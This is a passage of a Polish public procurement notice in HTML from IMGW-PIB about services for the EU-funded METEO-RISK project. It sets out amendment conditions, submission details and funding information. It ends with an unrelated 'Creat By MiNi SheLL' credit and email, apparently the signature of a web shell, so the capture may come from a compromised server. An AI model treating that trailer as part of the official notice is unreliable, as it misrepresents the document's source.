2)	zmian w innych, powiązanych z przedmiotem zamówienia przedsięwzięciach realizowanych lub przewidzianych do realizacji przez Zamawiającego, których to zmian nie można było przewidzieć w chwili zawarcia Umowy, wpływających na zakres, sposób lub terminy realizacji przedmiotu zamówienia, 
3)	zmian w organizacji Zamawiającego, wpływających na zakres, sposób lub terminy realizacji przedmiotu zamówienia, 
4)	zmian podejścia do realizacji wymagań opisanych w Załącznikach do Umowy, jeżeli taka zmiana wynika z nieprzewidzianych i niezależnych od Zamawiającego i Wykonawcy okoliczności, które wystąpiły w trakcie realizacji przedmiotu zamówienia oraz zmiana ta nie powoduje ograniczenia korzyści Zamawiającego, 
5)	zaistnienia innej okoliczności prawnej, ekonomicznej lub technicznej, skutkującej niemożliwością wykonania lub należytego wykonania Umowy zgodnie z SIWZ, siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imgw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Warszawa, ul. Podleśna 61, pokój 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2014 godzina 10:00, miejsce: Warszawa, ul. Podleśna 61, Kancelaria IMGW-PIB.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie dotyczy usaługi w zakresie realizacji Projektu METEO-RISK w ramach Programu Operacyjnego Infrastruktura i Środowisko, Priorytet III Zarządzanie zasobami i przeciwdziałanie zagrożeniom środowiska, Działanie 3.2 Zapobieganie oraz ograniczanie skutków zagrożeń naturalnych oraz przeciwdziałanie poważnym awariom.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com